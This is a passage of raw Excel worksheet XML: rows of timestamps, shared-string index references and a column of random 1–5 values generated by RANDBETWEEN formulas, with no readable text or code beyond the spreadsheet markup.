        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22305" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22305" s="1">
        <v>43049.430428240739</v>
      </c>
      <c r="C22305" t="s">
        <v>10</v>
      </c>
      <c r="D22305" t="s">
        <v>271</v>
      </c>
      <c r="E22305" s="2" t="s">
        <v>20136</v>
      </c>
      <c r="F22305">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22306" s="1">
        <v>43049.415300925924</v>
      </c>
      <c r="C22306" t="s">
        <v>41</v>
      </c>
      <c r="E22306" t="s">
        <v>20137</v>
      </c>
      <c r="F22306">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22307" s="1">
        <v>43049.397465277776</v>
      </c>
      <c r="C22307" t="s">
        <v>10</v>
      </c>
      <c r="D22307" t="s">
        <v>52</v>
      </c>
      <c r="E22307" t="s">
        <v>20138</v>
      </c>
      <c r="F22307">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22308" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22308" s="1">
        <v>43049.390659722223</v>
      </c>
      <c r="C22308" t="s">
        <v>10</v>
      </c>
      <c r="D22308" t="s">
        <v>36</v>
      </c>
      <c r="E22308" s="2" t="s">
        <v>20139</v>
      </c>
      <c r="F22308">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22309" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22309" s="1">
        <v>43049.36991898148</v>
      </c>
      <c r="C22309" t="s">
        <v>10</v>
      </c>
      <c r="D22309" t="s">
        <v>192</v>
      </c>
      <c r="E22309" s="2" t="s">
        <v>20140</v>
      </c>
      <c r="F22309">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22310" s="1">
        <v>43049.366064814814</v>
      </c>
      <c r="C22310" t="s">
        <v>4963</v>
      </c>
      <c r="D22310" t="s">
        <v>107</v>
      </c>
      <c r="E22310" t="s">
        <v>20141</v>
      </c>
      <c r="F22310">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22311" s="1">
        <v>43049.341793981483</v>
      </c>
      <c r="C22311" t="s">
        <v>41</v>
      </c>
      <c r="E22311" t="s">
        <v>2311</v>
      </c>
      <c r="F22311">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22312" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22312" s="1">
        <v>43049.329328703701</v>
      </c>
      <c r="C22312" t="s">
        <v>1064</v>
      </c>
      <c r="D22312" t="s">
        <v>6</v>
      </c>
      <c r="E22312" s="2" t="s">
        <v>20142</v>
      </c>
      <c r="F22312">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22313" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22313" s="1">
        <v>43049.312604166669</v>
      </c>
      <c r="C22313" t="s">
        <v>2192</v>
      </c>
      <c r="D22313" t="s">
        <v>36</v>
      </c>
      <c r="E22313" s="2" t="s">
        <v>20143</v>
      </c>
      <c r="F22313">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22314" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22314" s="1">
        <v>43049.29965277778</v>
      </c>
      <c r="C22314" t="s">
        <v>41</v>
      </c>
      <c r="E22314" s="2" t="s">
        <v>20144</v>
      </c>
      <c r="F22314">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22315" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22315" s="1">
        <v>43049.259641203702</v>
      </c>
      <c r="C22315" t="s">
        <v>41</v>
      </c>
      <c r="E22315" s="2" t="s">
        <v>20145</v>
      </c>
      <c r="F22315">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22316" s="1">
        <v>43049.204317129632</v>
      </c>
      <c r="C22316" t="s">
        <v>41</v>
      </c>
      <c r="E22316" t="s">
        <v>20146</v>
      </c>
      <c r="F22316">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22317" s="1">
        <v>43049.084328703706</v>
      </c>
      <c r="C22317" t="s">
        <v>1992</v>
      </c>
      <c r="D22317" t="s">
        <v>374</v>
      </c>
      <c r="E22317" t="s">
        <v>20147</v>
      </c>
      <c r="F22317">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22318" s="1">
        <v>43049.020729166667</v>
      </c>
      <c r="C22318" t="s">
        <v>10</v>
      </c>
      <c r="D22318" t="s">
        <v>6</v>
      </c>
      <c r="E22318" t="s">
        <v>20148</v>
      </c>
      <c r="F22318">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22319" s="1">
        <v>43048.862337962964</v>
      </c>
      <c r="C22319" t="s">
        <v>410</v>
      </c>
      <c r="E22319" t="s">
        <v>20149</v>
      </c>
      <c r="F22319">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22320" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22320" s="1">
        <v>43048.812847222223</v>
      </c>
      <c r="C22320" t="s">
        <v>454</v>
      </c>
      <c r="E22320" s="2" t="s">
        <v>20150</v>
      </c>
      <c r="F22320">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22321" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22321" s="1">
        <v>43048.721087962964</v>
      </c>
      <c r="C22321" t="s">
        <v>6</v>
      </c>
      <c r="D22321" t="s">
        <v>114</v>
      </c>
      <c r="E22321" s="2" t="s">
        <v>20151</v>
      </c>
      <c r="F22321">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22322" s="1">
        <v>43048.720821759256</v>
      </c>
      <c r="C22322" t="s">
        <v>10</v>
      </c>
      <c r="D22322" t="s">
        <v>23</v>
      </c>
      <c r="E22322" t="s">
        <v>20152</v>
      </c>
      <c r="F22322">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22323" s="1">
        <v>43048.655312499999</v>
      </c>
      <c r="C22323" t="s">
        <v>10</v>
      </c>
      <c r="D22323" t="s">
        <v>112</v>
      </c>
      <c r="E22323" t="s">
        <v>20153</v>
      </c>
      <c r="F22323">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22324" s="1">
        <v>43048.64402777778</v>
      </c>
      <c r="C22324" t="s">
        <v>10</v>
      </c>
      <c r="D22324" t="s">
        <v>80</v>
      </c>
      <c r="E22324" t="s">
        <v>20154</v>
      </c>
      <c r="F22324">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22325" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22325" s="1">
        <v>43048.622442129628</v>
      </c>
      <c r="C22325" t="s">
        <v>10</v>
      </c>
      <c r="D22325" t="s">
        <v>89</v>
      </c>
      <c r="E22325" s="2" t="s">
        <v>20155</v>
      </c>
      <c r="F22325">
        <f t="shared" ca="1" si="348"/>
        <v>4</v>
      </c>
    </row>
    <row r="22326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22326" s="1">
        <v>43048.591307870367</v>
      </c>
      <c r="C22326" t="s">
        <v>6</v>
      </c>
      <c r="D22326" t="s">
        <v>25</v>
      </c>
      <c r="E22326" t="s">
        <v>20156</v>
      </c>
      <c r="F22326">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22327" s="1">
        <v>43048.576805555553</v>
      </c>
      <c r="C22327" t="s">
        <v>48</v>
      </c>
      <c r="E22327" t="s">
        <v>20157</v>
      </c>
      <c r="F22327">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22328" s="1">
        <v>43048.575937499998</v>
      </c>
      <c r="C22328" t="s">
        <v>10</v>
      </c>
      <c r="D22328" t="s">
        <v>52</v>
      </c>
      <c r="E22328" t="s">
        <v>20158</v>
      </c>
      <c r="F22328">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22329" s="1">
        <v>43048.549976851849</v>
      </c>
      <c r="C22329" t="s">
        <v>10</v>
      </c>
      <c r="D22329" t="s">
        <v>817</v>
      </c>
      <c r="E22329" t="s">
        <v>20159</v>
      </c>
      <c r="F22329">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22330" s="1">
        <v>43048.535266203704</v>
      </c>
      <c r="C22330" t="s">
        <v>1414</v>
      </c>
      <c r="D22330" t="s">
        <v>312</v>
      </c>
      <c r="E22330" t="s">
        <v>11634</v>
      </c>
      <c r="F22330">
        <f t="shared" ca="1" si="348"/>
        <v>3</v>
      </c>
    </row>
    <row r="22331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22331" s="1">
        <v>43048.517164351855</v>
      </c>
      <c r="C22331" t="s">
        <v>6</v>
      </c>
      <c r="D22331" t="s">
        <v>114</v>
      </c>
      <c r="E22331" t="s">
        <v>20160</v>
      </c>
      <c r="F22331">
        <f t="shared" ca="1" si="348"/>
        <v>1</v>
      </c>
    </row>
    <row r="22332" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22332" s="1">
        <v>43048.50037037037</v>
      </c>
      <c r="C22332" t="s">
        <v>71</v>
      </c>
      <c r="E22332" s="2" t="s">
        <v>20161</v>
      </c>
      <c r="F22332">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22333" s="1">
        <v>43048.499247685184</v>
      </c>
      <c r="C22333" t="s">
        <v>10</v>
      </c>
      <c r="D22333" t="s">
        <v>112</v>
      </c>
      <c r="E22333" t="s">
        <v>20162</v>
      </c>
      <c r="F22333">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22334" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22334" s="1">
        <v>43048.493298611109</v>
      </c>
      <c r="C22334" t="s">
        <v>330</v>
      </c>
      <c r="D22334" t="s">
        <v>885</v>
      </c>
      <c r="E22334" s="2" t="s">
        <v>20163</v>
      </c>
      <c r="F22334">
        <f t="shared" ca="1" si="348"/>
        <v>5</v>
      </c>
    </row>
    <row r="22335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22335" s="1">
        <v>43048.490393518521</v>
      </c>
      <c r="C22335" t="s">
        <v>10</v>
      </c>
      <c r="D22335" t="s">
        <v>36</v>
      </c>
      <c r="E22335" t="s">
        <v>20164</v>
      </c>
      <c r="F22335">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22336" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22336" s="1">
        <v>43048.44636574074</v>
      </c>
      <c r="C22336" t="s">
        <v>50</v>
      </c>
      <c r="E22336" s="2" t="s">
        <v>20165</v>
      </c>
      <c r="F22336">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22337" s="1">
        <v>43048.444155092591</v>
      </c>
      <c r="C22337" t="s">
        <v>41</v>
      </c>
      <c r="E22337" t="s">
        <v>20166</v>
      </c>
      <c r="F22337">
        <f t="shared" ca="1" si="348"/>
        <v>2</v>
      </c>
    </row>
    <row r="22338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22338" s="1">
        <v>43048.42633101852</v>
      </c>
      <c r="C22338" t="s">
        <v>10</v>
      </c>
      <c r="D22338" t="s">
        <v>271</v>
      </c>
      <c r="E22338" t="s">
        <v>20167</v>
      </c>
      <c r="F22338">
        <f t="shared" ref="F22338:F22401" ca="1" si="349">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="22339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22339" s="1">
        <v>43048.411643518521</v>
      </c>
      <c r="C22339" t="s">
        <v>41</v>
      </c>
      <c r="E22339" t="s">
        <v>20168</v>
      </c>
      <c r="F22339">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22340" s="1">
        <v>43048.407546296294</v>
      </c>
      <c r="C22340" t="s">
        <v>10</v>
      </c>
      <c r="D22340" t="s">
        <v>151</v>
      </c>
      <c r="E22340" t="s">
        <v>20169</v>
      </c>
      <c r="F22340">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22341" s="1">
        <v>43048.401898148149</v>
      </c>
      <c r="C22341" t="s">
        <v>10</v>
      </c>
      <c r="D22341" t="s">
        <v>20</v>
      </c>
      <c r="E22341" t="s">
        <v>20170</v>
      </c>
      <c r="F22341">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22342" s="1">
        <v>43048.392557870371</v>
      </c>
      <c r="C22342" t="s">
        <v>10</v>
      </c>
      <c r="D22342" t="s">
        <v>80</v>
      </c>
      <c r="E22342" t="s">
        <v>20171</v>
      </c>
      <c r="F22342">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22343" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22343" s="1">
        <v>43048.357476851852</v>
      </c>
      <c r="C22343" t="s">
        <v>10</v>
      </c>
      <c r="D22343" t="s">
        <v>192</v>
      </c>
      <c r="E22343" s="2" t="s">
        <v>20172</v>
      </c>
      <c r="F22343">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22344" s="1">
        <v>43048.357395833336</v>
      </c>
      <c r="C22344" t="s">
        <v>10</v>
      </c>
      <c r="D22344" t="s">
        <v>1056</v>
      </c>
      <c r="E22344" t="s">
        <v>20173</v>
      </c>
      <c r="F22344">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22345" s="1">
        <v>43048.325868055559</v>
      </c>
      <c r="C22345" t="s">
        <v>60</v>
      </c>
      <c r="F22345">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22346" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22346" s="1">
        <v>43048.309178240743</v>
      </c>
      <c r="C22346" t="s">
        <v>124</v>
      </c>
      <c r="E22346" s="2" t="s">
        <v>20174</v>
      </c>
      <c r="F22346">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22347" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22347" s="1">
        <v>43048.300069444442</v>
      </c>
      <c r="C22347" t="s">
        <v>48</v>
      </c>
      <c r="E22347" s="2" t="s">
        <v>19480</v>
      </c>
      <c r="F22347">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22348" s="1">
        <v>43048.268425925926</v>
      </c>
      <c r="C22348" t="s">
        <v>48</v>
      </c>
      <c r="E22348" t="s">
        <v>20175</v>
      </c>
      <c r="F22348">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22349" s="1">
        <v>43048.248171296298</v>
      </c>
      <c r="C22349" t="s">
        <v>189</v>
      </c>
      <c r="E22349" t="s">
        <v>20176</v>
      </c>
      <c r="F22349">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22350" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A22350" s="1">
        <v>43048.229733796295</v>
      </c>
      <c r="C22350" t="s">
        <v>48</v>
      </c>
      <c r="E22350" s="2" t="s">
        <v>20177</v>
      </c>
      <c r="F22350">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22351" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A22351" s="1">
        <v>43048.229224537034</v>
      </c>
      <c r="C22351" t="s">
        <v>10</v>
      </c>
      <c r="D22351" t="s">
        <v>6</v>
      </c>
      <c r="E22351" s="2" t="s">
        <v>20178</v>
      </c>
      <c r="F22351">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22352" s="1">
        <v>43048.214895833335</v>
      </c>
      <c r="C22352" t="s">
        <v>65</v>
      </c>
      <c r="E22352" t="s">
        <v>20179</v>
      </c>
      <c r="F22352">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22353" s="1">
        <v>43048.209652777776</v>
      </c>
      <c r="C22353" t="s">
        <v>41</v>
      </c>
      <c r="E22353" t="s">
        <v>20180</v>
      </c>
      <c r="F22353">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22354" s="1">
        <v>43048.193287037036</v>
      </c>
      <c r="C22354" t="s">
        <v>103</v>
      </c>
      <c r="E22354" t="s">
        <v>20181</v>
      </c>
      <c r="F22354">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22355" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22355" s="1">
        <v>43048.166527777779</v>
      </c>
      <c r="C22355" t="s">
        <v>686</v>
      </c>
      <c r="D22355" t="s">
        <v>312</v>
      </c>
      <c r="E22355" s="2" t="s">
        <v>20182</v>
      </c>
      <c r="F22355">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22356" s="1">
        <v>43048.123657407406</v>
      </c>
      <c r="C22356" t="s">
        <v>67</v>
      </c>
      <c r="E22356" t="s">
        <v>20183</v>
      </c>
      <c r="F22356">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22357" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22357" s="1">
        <v>43048.117222222223</v>
      </c>
      <c r="C22357" t="s">
        <v>41</v>
      </c>
      <c r="E22357" s="2" t="s">
        <v>20184</v>
      </c>
      <c r="F22357">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22358" s="1">
        <v>43048.048437500001</v>
      </c>
      <c r="C22358" t="s">
        <v>118</v>
      </c>
      <c r="E22358" t="s">
        <v>20185</v>
      </c>
      <c r="F22358">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22359" s="1">
        <v>43047.995081018518</v>
      </c>
      <c r="C22359" t="s">
        <v>6</v>
      </c>
      <c r="D22359" t="s">
        <v>25</v>
      </c>
      <c r="E22359" t="s">
        <v>20186</v>
      </c>
      <c r="F22359">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22360" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22360" s="1">
        <v>43047.985914351855</v>
      </c>
      <c r="C22360" t="s">
        <v>10</v>
      </c>
      <c r="D22360" t="s">
        <v>14</v>
      </c>
      <c r="E22360" s="2" t="s">
        <v>20187</v>
      </c>
      <c r="F22360">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22361" s="1">
        <v>43047.884710648148</v>
      </c>
      <c r="C22361" t="s">
        <v>41</v>
      </c>
      <c r="E22361" t="s">
        <v>20188</v>
      </c>
      <c r="F22361">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22362" s="1">
        <v>43047.816990740743</v>
      </c>
      <c r="C22362" t="s">
        <v>10</v>
      </c>
      <c r="D22362" t="s">
        <v>374</v>
      </c>
      <c r="E22362" t="s">
        <v>20189</v>
      </c>
      <c r="F22362">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22363" s="1">
        <v>43047.809340277781</v>
      </c>
      <c r="C22363" t="s">
        <v>140</v>
      </c>
      <c r="D22363" t="s">
        <v>234</v>
      </c>
      <c r="E22363" t="s">
        <v>20190</v>
      </c>
      <c r="F22363">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22364" s="1">
        <v>43047.791203703702</v>
      </c>
      <c r="C22364" t="s">
        <v>10</v>
      </c>
      <c r="D22364" t="s">
        <v>6</v>
      </c>
      <c r="E22364" t="s">
        <v>20191</v>
      </c>
      <c r="F22364">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22365" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22365" s="1">
        <v>43047.778460648151</v>
      </c>
      <c r="C22365" t="s">
        <v>328</v>
      </c>
      <c r="D22365" t="s">
        <v>1056</v>
      </c>
      <c r="E22365" s="2" t="s">
        <v>20192</v>
      </c>
      <c r="F22365">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22366" s="1">
        <v>43047.70925925926</v>
      </c>
      <c r="C22366" t="s">
        <v>10</v>
      </c>
      <c r="D22366" t="s">
        <v>94</v>
      </c>
      <c r="E22366" t="s">
        <v>20193</v>
      </c>
      <c r="F22366">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22367" s="1">
        <v>43047.688622685186</v>
      </c>
      <c r="C22367" t="s">
        <v>10</v>
      </c>
      <c r="D22367" t="s">
        <v>6</v>
      </c>
      <c r="E22367" t="s">
        <v>20194</v>
      </c>
      <c r="F22367">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22368" s="1">
        <v>43047.654490740744</v>
      </c>
      <c r="C22368" t="s">
        <v>10</v>
      </c>
      <c r="D22368" t="s">
        <v>20</v>
      </c>
      <c r="E22368" t="s">
        <v>20195</v>
      </c>
      <c r="F22368">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22369" s="1">
        <v>43047.653553240743</v>
      </c>
      <c r="C22369" t="s">
        <v>10</v>
      </c>
      <c r="D22369" t="s">
        <v>163</v>
      </c>
      <c r="E22369" t="s">
        <v>20196</v>
      </c>
      <c r="F22369">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22370" s="1">
        <v>43047.651990740742</v>
      </c>
      <c r="C22370" t="s">
        <v>10</v>
      </c>
      <c r="D22370" t="s">
        <v>89</v>
      </c>
      <c r="F22370">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22371" s="1">
        <v>43047.627789351849</v>
      </c>
      <c r="C22371" t="s">
        <v>10735</v>
      </c>
      <c r="D22371" t="s">
        <v>494</v>
      </c>
      <c r="E22371" t="s">
        <v>20197</v>
      </c>
      <c r="F22371">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22372" s="1">
        <v>43047.627430555556</v>
      </c>
      <c r="C22372" t="s">
        <v>623</v>
      </c>
      <c r="D22372" t="s">
        <v>713</v>
      </c>
      <c r="E22372" t="s">
        <v>20198</v>
      </c>
      <c r="F22372">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22373" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22373" s="1">
        <v>43047.611319444448</v>
      </c>
      <c r="C22373" t="s">
        <v>10</v>
      </c>
      <c r="D22373" t="s">
        <v>6</v>
      </c>
      <c r="E22373" s="2" t="s">
        <v>20199</v>
      </c>
      <c r="F22373">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22374" s="1">
        <v>43047.606863425928</v>
      </c>
      <c r="C22374" t="s">
        <v>10</v>
      </c>
      <c r="D22374" t="s">
        <v>107</v>
      </c>
      <c r="E22374" t="s">
        <v>20200</v>
      </c>
      <c r="F22374">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22375" s="1">
        <v>43047.593148148146</v>
      </c>
      <c r="C22375" t="s">
        <v>6</v>
      </c>
      <c r="D22375" t="s">
        <v>25</v>
      </c>
      <c r="E22375" t="s">
        <v>20201</v>
      </c>
      <c r="F22375">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22376" s="1">
        <v>43047.55908564815</v>
      </c>
      <c r="C22376" t="s">
        <v>10</v>
      </c>
      <c r="D22376" t="s">
        <v>112</v>
      </c>
      <c r="E22376" t="s">
        <v>20202</v>
      </c>
      <c r="F22376">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22377" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22377" s="1">
        <v>43047.532280092593</v>
      </c>
      <c r="C22377" t="s">
        <v>197</v>
      </c>
      <c r="E22377" s="2" t="s">
        <v>20203</v>
      </c>
      <c r="F22377">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22378" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22378" s="1">
        <v>43047.531921296293</v>
      </c>
      <c r="C22378" t="s">
        <v>10</v>
      </c>
      <c r="D22378" t="s">
        <v>192</v>
      </c>
      <c r="E22378" s="2" t="s">
        <v>20204</v>
      </c>
      <c r="F22378">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22379" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22379" s="1">
        <v>43047.531157407408</v>
      </c>
      <c r="C22379" t="s">
        <v>189</v>
      </c>
      <c r="E22379" s="2" t="s">
        <v>20205</v>
      </c>
      <c r="F22379">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22380" s="1">
        <v>43047.530300925922</v>
      </c>
      <c r="C22380" t="s">
        <v>10</v>
      </c>
      <c r="D22380" t="s">
        <v>46</v>
      </c>
      <c r="E22380" t="s">
        <v>20206</v>
      </c>
      <c r="F22380">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22381" s="1">
        <v>43047.51734953704</v>
      </c>
      <c r="C22381" t="s">
        <v>10</v>
      </c>
      <c r="D22381" t="s">
        <v>80</v>
      </c>
      <c r="E22381" t="s">
        <v>20207</v>
      </c>
      <c r="F22381">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22382" s="1">
        <v>43047.517280092594</v>
      </c>
      <c r="C22382" t="s">
        <v>10</v>
      </c>
      <c r="D22382" t="s">
        <v>80</v>
      </c>
      <c r="E22382" t="s">
        <v>20207</v>
      </c>
      <c r="F22382">
        <f t="shared" ca="1" si="349"/>
